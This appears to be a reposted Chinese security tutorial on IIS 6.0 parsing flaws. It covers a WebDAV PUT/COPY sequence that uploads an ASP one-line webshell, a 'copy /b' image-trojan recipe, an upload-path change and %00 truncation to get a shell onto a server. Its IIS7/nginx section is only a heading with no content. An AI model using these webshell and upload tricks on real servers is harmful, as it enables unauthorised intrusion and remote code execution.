关于解析漏洞

Posted 52xuege

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了关于解析漏洞相关的知识,希望对你有一定的参考价值。

IIS6.0 解析漏洞

1.在网站目录中如果存在名为*.asp、*asa的目录,那么该目录下内的任何文件都会被解析成asp文件被执行。

2.再上传图片木马的时候,将文件名改为*.asp;,jpg,该文件文件都会被IIS解析为asp文件执行。

3.还有IIS6.0 默认的可执行文件除了asp还包含这三种/wooyun.cer、/wooyun.asa、/wooyun.cdx

4.(转载)WebDav漏洞(对IIS写权限的利用,这个我们在之前学http请求的时候就说过的请求头和正文语句,这段好好看)

  • 第一步,通过OPTIONS探测服务器所支持的HTTP方法

请求:

OPTIONS / HTTP/1.1

Host:www.example.com

响应:

Public:OPTIONS,TRACE,GET,HEAD,DELETE,PUT,POST,COPY,MOVE,MKCOL,PROPFIND,PROPPATCH,LOCK,UNLOCK,SEARCH

  • 第二步,通过PUT方法向服务器上传脚本文件

请求:

PUT /a.txt HTTP/1.1

Host:www.example.com

Content-Length:30

<%eval request("chopper")%>

第三步,通过Move或Copy方法改名

请求:

COPY /a.txt HTTP/1.1

Host:www.example.com

Destination:http://www.example.com/cmd.asp

第四步,使用DELETE方法,攻击者还可以删除服务器上的任意文件

请求:

DELETE /a.txt HTTP/1.1

Host:www.example.com

5.当你上传的木马如asp/aspx,必须在IIS6.0环境,且在以x.asp为名称的文件夹下面,才能执行图片里的代码,也就是说,图片木马执行必须满足2个条件:A:有x.asp文件夹;B:图片木马在x.asp文件夹下,那么怎么去达到这种目的就需要奇艺技巧了,常见的是通过%00截断和一些个更改上传时候的属性。(下面会讲到)

------------------------------------------------------------------------------------------------------------------------------------------------------------------------

图片木马制作方法

使用CMD制作一句话木马。

参数/b指定以二进制格式复制、合并文件; 用于图像类/声音类文件

参数/a指定以ASCII格式复制、合并文件。用于txt等文档类文件

copy 1.jpg/b+1.php 2.jpg

//意思是将1.jpg以二进制与1.php合并成2.jpg

那么2.jpg就是图片木马了。

--------------------------------------------------------------------------------------------------

查看数据包,其中Content-Disposition:form-data;name=”path”下面的一行为服务保存文件的相对路径,我们把原本的 uploadimg/ 改为 uploadimg/1.php;

---------------------------------------------------------------------------------------------------

截断上传,是借助%00截断上传使%00后面的字串被忽略,如:1.asp.jpg=1.asp%00.jpg,从而成功上传shell。

---------------------------------------------------------------------------------------------------

二、IIS7.0/IIS 7.5/ nginx <8.03畸形解析漏洞

 

以上是关于关于解析漏洞的主要内容,如果未能解决你的问题,请参考以下文章

关于XML解析的外部实例引用漏洞攻击XXE

安全测试 web安全测试 常规安全漏洞 可能存在SQL和JS注入漏洞场景分析。为什么自己没有找到漏洞,哪么可能存在漏洞场景是?SQL注入漏洞修复 JS注入漏洞修复 漏洞存在场景分析和修复示例(代码片段

关于 Linux Polkit 权限提升漏洞(CVE-2021-4034)的修复方法

为 Blogger 上的博客格式化代码片段 [关闭]

Apache解析漏洞

片段(Java) | 机试题+算法思路+考点+代码解析 2023